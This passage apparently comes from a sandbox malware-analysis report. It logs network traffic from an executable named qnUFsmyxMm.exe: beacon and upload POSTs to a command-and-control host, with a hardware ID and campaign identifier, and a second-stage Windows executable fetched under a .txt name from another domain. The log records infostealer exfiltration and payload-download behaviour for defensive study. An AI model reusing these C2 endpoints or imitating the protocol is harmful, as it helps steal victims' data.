name="pid"1--C6D00O4HZE40U0P76Content-Disposition: form-data; name="lid"c2CoW0--viki-1
2025-01-01 15:54:04 UTC	1134	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=32og1e2g4gteuihtsi2g0fubka; expires=Sun, 27 Apr 2025 09:40:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FkALr4zG0fwUBrgUm6Q8X1wbu%2Fmhm0Ogz3QXvgwQMR4wfno5A45OF17iPGWJ2GLcvFVWxX643Gv1GxBsS36SkOvenT6P1JeHIbEeyr%2FECr0l%2Bd5tf%2Bg34GFuUtgU1dOTrnr6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af904ed64277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1760&rtt_var=710&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2156&delivery_rate=1659090&cwnd=191&unsent_bytes=0&cid=ad0a6048e011f6e9&ts=460&x=0"
2025-01-01 15:54:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:54:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49981	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:54:05 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WEK41AY1KJLIER2YQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 577242 Host: leeryspcieu.click
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 2d 2d 57 45 4b 34 31 41 59 31 4b 4a 4c 49 45 52 32 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 57 45 4b 34 31 41 59 31 4b 4a 4c 49 45 52 32 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 45 4b 34 31 41 59 31 4b 4a 4c 49 45 52 32 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a Data Ascii: --WEK41AY1KJLIER2YQContent-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--WEK41AY1KJLIER2YQContent-Disposition: form-data; name="pid"1--WEK41AY1KJLIER2YQContent-Disposition: form-data; name="lid"c2CoW0--viki-1
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 81 05 9a e4 04 d0 ac 30 70 19 04 fe 2a ad 18 44 82 17 f6 52 b5 b3 ad c4 ea da 5b 33 16 e9 fe bc bf 5f 08 82 8f bf 2b cb 5f a9 c1 38 0f 0f ea 79 4b fe 8c f1 ff 42 6a d2 97 3d 3b 11 26 a5 fd 2f bf fb 8f 54 fb 79 fd 72 7f ee cf 0f f4 aa f0 40 76 45 9a ee 2c ba c2 4a 2e b2 1a 77 fe 07 50 9a 1e ff bf db 4d fe ef 03 3c 44 07 e0 cc 14 05 5a 09 84 7e 43 58 b0 f1 41 fb 68 46 4d 26 28 8c 77 12 bd d0 d0 6f 17 92 fd 98 fb 33 46 08 e9 4f 65 bd 4e db 11 00 52 8d b4 60 78 7c b0 17 ec 8c 81 1e 7b 43 fa ae ec 3d 3d cd c1 18 77 5a a3 3c ee f8 aa b3 1c ea 72 85 73 c7 6e db bc 05 d4 12 29 01 e1 f6 51 89 c2 4c 5f f3 d8 43 ed 9c 48 3a 3a 89 eb 75 2f 45 f4 08 e7 7a 3b 0a 02 bf 5f 99 4e ee a7 35 4e 9f a2 73 7b 7e 50 43 75 fb bc 89 0b 9b 34 d1 73 63 62 07 d4 05 65 c3 bf 7d 03 48 Data Ascii: 0p*DR[3_+_8yKBj=;&/Tyr@vE,J.wPM<DZ~CXAhFM&(wo3FOeNR`x\|{C==wZ<rsn)QL_CH::u/Ez;_N5Ns{~PCu4scbe}H
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 5b b0 6a ed 12 85 bd 60 bf 8b 14 60 21 00 ee 50 d5 c3 e5 d1 00 1f 62 c2 a3 95 78 8d 1c d1 bd 0c 4f b1 b9 f6 91 c4 9f 29 55 36 a2 32 f3 3a d4 39 ab 11 6c 8e e2 b2 bf d1 76 6e 08 75 de d0 0f 41 df 25 f8 a4 3a 56 aa 61 e1 97 11 e3 99 7d 49 78 f6 f3 0a 7f 0b 6d 90 56 1a 66 89 a0 e5 15 22 00 5b 0f bb 33 28 cc 7a 00 e8 56 06 ff 9b 64 e7 80 a5 1f 20 b3 10 e4 7e 49 39 78 b6 89 22 c8 75 7b 92 ff df be ed f2 a9 e2 c9 e6 0a 90 00 90 44 de f3 b9 cf 13 07 22 bb 34 64 50 90 00 eb 83 b8 e8 a4 48 07 70 de 09 67 29 8e 48 3b 40 87 42 2f 80 81 c7 d5 4c 8f 62 8b 82 57 cd f9 97 4e dd 9b 87 5d 30 58 93 6d bb 2b bb af 20 6e a8 cb 80 07 98 a5 7b a3 85 69 0e d9 a8 6e 33 38 26 68 36 22 3d 65 48 db 51 c5 58 c6 47 bd f9 ae 9a d0 71 bc c4 47 dc 10 3c f8 30 13 f5 5a a9 58 8f 52 b0 b7 Data Ascii: [j``!PbxO)U62:9lvnuA%:Va}IxmVf"[3(zVd ~I9x"u{D"4dPHpg)H;@B/LbWN]0Xm+ n{in38&h6"=eHQXGqG<0ZXR
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: da bf cb 40 dd 76 0e 1f f9 a8 bc 9e e5 92 10 ff 4b 03 a9 e1 33 88 8e 51 e8 ce d0 30 5b fd 25 6f c7 4b b8 32 91 3a 91 66 59 a3 9e 12 ee d2 e9 3a 76 69 2b d9 57 a4 1d a3 f1 a7 0f 4b ec e6 78 2a 88 1d 49 4d 63 79 d4 ee 4e f7 70 76 8a d8 21 b2 69 a1 82 7c 55 2b 72 f5 0c 5d 15 b5 63 4f 6a 62 b2 3a 6b 62 66 be 9a 95 c9 20 4f 34 a4 ff c5 85 0f a1 fa 13 bf 6d d9 0f 32 d2 65 c2 2f 97 09 d4 57 6e 31 d7 47 c6 62 66 f8 a9 ed 84 af 0d 67 bf 6e 76 7c d1 d8 77 4b 92 96 ba f4 2a 2d 3d c4 0c 81 80 a0 98 58 99 02 1b c4 85 6b 0b 28 72 18 04 31 65 c0 55 ac ae 24 44 d4 d2 28 50 7f 68 72 fd fc a8 e9 9e a3 a0 97 1f a3 9a ca 31 cf 07 19 14 ea e5 1f a6 15 e1 5f f5 73 4a ff f4 35 d4 b9 fd 41 1e 74 d5 61 3f ac 67 3d db f3 5e 0c 58 5e 01 96 98 b2 8f 80 2a b9 ee ee 7a 20 43 0d 14 c6 Data Ascii: @vK3Q0[%oK2:fY:vi+WKxIMcyNpv!i\|U+r]cOjb:kbf O4m2e/Wn1Gbfgnv\|wK-=Xk(r1eU$D(Phr1_sJ5Ata?g=^X^*z C
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 1f f5 7a 03 12 17 f1 06 82 ed 88 aa cf 52 e4 cc 90 b8 ae 56 5b 2e c0 c3 29 33 07 c9 39 55 52 bd bc 6b ec 20 05 3a 8a a2 fb e1 55 42 3c 5e 86 af 24 0f 5f 67 48 13 e8 ba 99 ef cf 8c be 1a 6d c6 84 15 de 56 b9 f8 a8 24 e2 33 5a 77 72 16 99 53 04 17 fe c1 87 40 97 bb 79 a8 d8 d6 8c 2a 01 41 68 0c 53 8e 8e 40 91 55 11 3f 6f 16 98 07 1c 2f 39 ad d1 1c e2 b7 1e 6d 4f 6e b5 e9 fe 02 11 d0 f7 c5 41 c7 af ec 35 a0 1c 4d b9 d7 ea ea 44 5b e9 d4 d5 70 db ea 9b 56 77 56 30 49 af c3 b7 f0 46 e9 ca c0 56 c5 bf 14 c2 80 40 2e 68 d7 06 03 c5 0f ba 66 b8 9b 14 9c 15 80 fc e8 c8 a0 8d c2 f7 16 8e d2 a1 37 f5 56 03 e1 9e 7f 27 33 ec 0b 2d f9 39 76 e0 fa 69 02 16 ed ba c2 0d 29 38 90 00 29 16 21 c2 8f d8 f9 b9 1f 83 c1 dc 84 6b 0b ea d0 52 58 68 64 64 10 39 dc 6f 53 b3 9f 8f Data Ascii: zRV[.)39URk :UB<^$_gHmV$3ZwrS@y*AhS@U?o/9mOnA5MD[pVwV0IFV@.hf7V'3-9vi)8)!kRXhdd9oS
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 3b 47 05 5f 7b 34 aa 31 40 e2 e0 13 86 e4 9a b5 fe 36 23 bb 04 e2 28 e7 59 6a 9c 8f 34 e3 5b db a8 ad a9 59 6a 0b 6a 99 66 e7 04 2f a5 47 a5 0b 4c 3e 62 fc ac 46 f4 ff 59 4a 5f 4c a5 95 6b bc a3 4a 68 29 db d6 23 db ac ce 48 45 d1 35 4a e2 57 1c fd 71 cb 8a 7d a2 95 95 62 b6 d2 40 42 b6 88 48 b2 f4 db 89 af 1f 0b 5b 78 25 3f 15 c3 80 5d ab 79 eb db bd f4 5b dc 17 8e 8d b5 61 8c e9 ad 6f 95 f0 34 ae 43 1f 76 e2 78 28 b3 aa 24 1e ca df 57 25 f1 35 44 7c 67 7f fe 53 a8 ce d8 19 57 f7 be 97 e0 4b 3a ea bb d5 ed e6 9c 26 f9 70 4d 12 c5 f8 bb 65 e1 5b 70 c5 96 dd 06 33 c7 32 44 7c 24 ee 12 b8 32 9c 88 fa 48 be 70 7a 22 53 1d 0f cd c6 8c da e6 d4 44 71 dd 23 52 38 1a e7 59 e6 10 42 c8 c8 81 3c 85 cd ba 8b ca 80 b0 36 d8 f5 f3 96 21 3b c3 7d dd 72 c8 55 01 44 1d Data Ascii: ;G_{41@6#(Yj4[Yjjf/GL>bFYJ_LkJh)#HE5JWq}b@BH[x%?]y[ao4Cvx($W%5D\|gSWK:&pMe[p32D\|$2Hpz"SDq#R8YB<6!;}rUD
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 59 32 49 8d ba 69 f1 68 75 7e 60 66 75 bb bc 66 bb 4f 35 81 d1 cd cd 67 88 76 56 87 dc c0 01 b3 64 43 41 b1 17 62 e0 47 54 96 4a dc 00 43 0b 44 4c ed 2d 3f 8b 03 3b 44 50 b2 81 57 5b b2 8f 9b ca da d3 67 4c 48 77 03 6c 2b 57 b3 97 f3 f4 b3 b8 2b ae db 2f 2f 43 60 7d f6 6f de d9 bf 88 40 c7 00 c9 10 3a dd c9 3d 0f 47 13 38 8b 8f 67 db 89 27 47 4e cf 51 34 71 b7 97 d6 c2 3b 25 2f 9c 71 be 9f 63 81 17 a9 5c 5a be 19 c0 cf b9 2b 77 5b e6 98 90 d5 97 8b 5a cb ce dc ab 8f 1a 3d 75 46 37 93 43 07 7b 46 d0 85 d6 17 7c 6b 6d 72 c7 b7 e4 1f f4 2c 7c 84 90 e2 35 80 62 8d af fd 08 d9 8f 8d b5 d4 69 60 18 da b5 02 b6 a1 b3 c8 ff 2e 41 8c 77 d9 b9 ec 48 15 69 78 2c a3 09 f7 3f d0 c5 04 4c fc 48 cd 19 27 f8 0e c8 0a 06 97 76 23 01 41 b4 39 68 6b 8c 51 07 fc fa c0 7c 67 Data Ascii: Y2Iihu~`fufO5gvVdCAbGTJCDL-?;DPW[gLHwl+W+//C`}o@:=G8g'GNQ4q;%/qc\Z+w[Z=uF7C{F\|kmr,\|5bi`.AwHix,?LH'v#A9hkQ\|g
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: d3 9e 7f 86 e4 2d 7f 17 26 32 d1 b0 00 86 7f 51 06 dd 35 31 39 ef c6 b2 1d 88 d1 57 d2 82 4c c4 fb 4a a7 cf 37 b8 2a 67 cf 4f a4 9b 38 28 5e 56 7e ae 3f af d6 e1 96 60 5b af 24 1f a1 7b 59 38 89 a7 09 f9 85 36 12 b6 b7 9c 76 99 b4 4c 1c 09 ef c7 07 b9 43 d9 95 ab 6a e5 3f b1 c5 8f 23 c7 ee 9b e9 47 f0 40 6f 86 ba 47 46 54 e9 5f 89 dc cc a0 d2 67 7e 7f 4a bc bf 45 66 a8 06 bd 91 24 d3 7b c5 05 bb 7f 67 da 4a bc 3f 5d 5e 49 4f 11 24 fb 9c fe fd e7 6e 08 08 76 f6 f3 61 c0 23 e5 cc c7 ae c8 ec 44 ea ed 79 4d 76 8d 38 d7 d3 bf ec 49 9d 77 c5 0d 9e 96 c3 ea d1 57 fa 96 c7 4c 21 bb e3 ee f6 d7 b9 ff 7e af 78 1c a5 d1 2d 59 27 08 ef e5 78 33 58 18 dc ad 55 f1 70 fc f9 ad ec 30 e3 48 09 7d d4 6a 6d 2d d2 66 ce ad f9 4e de 5a 0e 22 13 01 46 16 da 31 9a fe 9e 91 87 Data Ascii: -&2Q519WLJ7*gO8(^V~?`[${Y86vLCj?#G@oGFT_g~JEf${gJ?]^IO$nva#DyMv8IwWL!~x-Y'x3XUp0H}jm-fNZ"F1
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: ba 21 d6 47 d7 fa 6e 6c d6 68 e6 f1 07 ba 1e 5f 6d b4 8d 1d 65 3c 50 94 6f ab 21 7a 8c 1d c6 45 ab 76 01 ee e4 7c d4 49 3c 5c 74 bb 63 ae 9e 6d e1 9e 9d 88 3b b0 53 1e 61 be c2 bc c6 83 a8 2a 64 e5 cb 9f e3 a4 91 52 08 89 e3 c2 5f c6 e9 fa 27 8e 8b 68 38 c2 b2 73 57 c7 6c 23 08 a3 b5 02 dc 5b c0 e6 ab b1 04 40 70 de 8c 5a a3 2d 08 b0 8b b7 48 f6 f1 c8 df 6b 27 6d b3 d1 31 6b e1 76 66 f5 77 31 94 b4 0d 4c cc f8 90 2e 46 ab 15 91 90 44 6c 65 22 59 c8 d9 9f 7f e3 e4 87 f9 3e 7e 27 1f 8f 8d 32 a3 30 9f 89 33 ce 61 f3 08 c5 65 5b 89 ca 4b 5f 27 35 db 1b 57 15 75 5e ed a0 a2 22 6e 4b 11 fa c2 df 1d c6 7b 02 d8 5f e4 d0 d1 56 e6 94 7e db cf 56 d2 93 5d 32 f7 cd 55 26 cf f5 e4 92 3b 2a 39 1f 8f e9 d2 48 be 5b a2 9b 6f 0e 74 28 ea 29 e1 13 eb d3 14 ec 30 84 fb df Data Ascii: !Gnlh_me<Po!zEv\|I<\tcm;SadR_'h8sWl#[@pZ-Hk'm1kvfw1L.FDle"Y>~'203ae[K_'5Wu^"nK{_V~V]2U&;9H[ot()0
2025-01-01 15:54:05 UTC	15331	OUT	Data Raw: 5b b9 08 fd ef b8 45 5e 99 f5 11 8f 7f 7b 6b fd db e6 d2 cf 5d 80 b7 da 04 20 61 01 e6 9d 7b dc 8b 03 16 b3 a9 8c 22 d1 e1 ac 0b 66 2f ea 01 b5 24 89 5a 2d 06 6e ec b4 cb a9 f7 f2 6a e0 19 93 1d ba 18 f0 bc 53 4c 3e a7 7a 9a e3 f6 a4 b9 f8 08 e7 c6 f7 58 29 78 2f eb 40 6a 8c 04 c0 77 e0 18 38 02 be 1b 05 cb 6e 7d d1 fe d2 c2 cb 74 a6 11 d1 e5 ce 16 97 2c 50 b0 6e 6c a7 70 4b 9e e6 31 60 69 91 dd 50 af b2 16 92 dc 82 24 96 a3 54 7b dc 90 5a ca 4a 7d 54 75 96 aa bc d0 fd 45 17 04 a9 92 03 b6 24 c0 87 75 33 41 43 99 a9 57 c5 7c 79 98 c5 cc e3 d1 1b a7 de 60 af 0c 35 a0 75 b7 e8 21 fd 3d 26 f9 e7 4a 34 93 e0 08 29 d0 db 80 07 c4 7c 80 12 af 3e 40 57 a2 29 25 9b 28 de d4 66 ee 8d 32 12 04 ab f6 6e f5 76 48 96 e0 16 85 d8 60 6c 1e be 63 6b d7 ac 19 2b 55 d4 b5 Data Ascii: [E^{k] a{"f/$Z-njSL>zX)x/@jw8n}t,PnlpK1`iP$T{ZJ}TuE$u3ACW\|y`5u!=&J4)\|>@W)%(f2nvH`lck+U
2025-01-01 15:54:07 UTC	1133	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p35d0hnu51hklf9t4qsm0n5rj3; expires=Sun, 27 Apr 2025 09:40:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F17npHrlhzctzpgM0rnS1WKHkhNVRAEq6r9Bq5fdB6S6EDaUi1xlbKrfRZb2dRVhW6uG342Kg%2FEbgCbD2bgFCB88Jpu6lWg6Y5Jbm2lip1ddYCYdOwtdUMWmFlJs0NTtyjGu6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af98ff3cc3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1471&rtt_var=600&sent=200&recv=594&lost=0&retrans=0&sent_bytes=2843&recv_bytes=579811&delivery_rate=1751649&cwnd=160&unsent_bytes=0&cid=0b7c03fc6a9c1a86&ts=1658&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49982	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:54:07 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 83 Host: leeryspcieu.click
2025-01-01 15:54:07 UTC	83	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 26 6a 3d 26 68 77 69 64 3d 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--viki-1&j=&hwid=F771030F9526602D0EE189CCD4D6D92A
2025-01-01 15:54:08 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=smtai1j7o8jh85jab7nq5ren10; expires=Sun, 27 Apr 2025 09:40:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCoCOEcYQXibj%2BWknWOcLzM0OrHFrM1mCCZ70nmN38z7R5CUjSCVyuG6NPYyW2KkjIbwZ%2BgiA6YunaXjMghJNlpBTjwXSTHHj7LYm1TlCF9qKZyNbiFX%2FWwJZkgO5po6QARIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3afa6aea3c34a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1519&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=984&delivery_rate=1922317&cwnd=155&unsent_bytes=0&cid=e0b275a82ec89c65&ts=492&x=0"
2025-01-01 15:54:08 UTC	138	IN	Data Raw: 38 34 0d 0a 44 6e 66 70 6d 6f 59 4c 50 36 57 2b 58 4d 78 31 36 79 6d 61 41 65 44 63 4e 65 71 4d 35 38 63 6e 61 4c 61 79 33 50 76 43 4c 38 5a 56 44 4d 76 76 70 44 45 64 7a 63 6f 6f 76 41 62 52 64 62 56 64 7a 37 64 5a 67 2f 79 4e 70 6c 55 42 30 4e 4f 39 31 62 46 48 71 58 34 72 78 76 50 6f 66 32 44 47 30 69 79 54 54 64 4d 52 6f 69 2b 55 70 45 48 49 6f 4d 57 68 55 30 71 4d 67 76 44 5a 70 77 33 38 50 67 71 30 0d 0a Data Ascii: 84DnfpmoYLP6W+XMx16ymaAeDcNeqM58cnaLay3PvCL8ZVDMvvpDEdzcoovAbRdbVdz7dZg/yNplUB0NO91bFHqX4rxvPof2DG0iyTTdMRoi+UpEHIoMWhU0qMgvDZpw38Pgq0
2025-01-01 15:54:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49983	188.114.97.3	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:54:08 UTC	207	OUT	GET /int_clp_8888.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipjarifaa.shop
2025-01-01 15:54:09 UTC	899	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:08 GMT Content-Type: text/plain Content-Length: 8856972 Connection: close Accept-Ranges: bytes ETag: "c89c55fe25372bfbf8b9264a647c144b" Last-Modified: Sat, 28 Dec 2024 20:45:06 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbAWjcHDuPyfa4z4P6XmRl0QuZ%2Fdls%2FXZq7gSeC4V8Uq5AyNhR2wvaydOjgxGJwAME6yfJbL5yOjAqj7hYSecwfLLxY5b9Ge6ghG1s6IqhIUZv5YISH0dmKQtcs0vWNIF9Pw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3afacf9d743e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2113&min_rtt=2094&rtt_var=823&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=821&delivery_rate=1300089&cwnd=226&unsent_bytes=0&cid=37b9d9c9d0ce9a2d&ts=322&x=0"
2025-01-01 15:54:09 UTC	470	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74 Data Ascii: RESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Dat
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54 Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassT
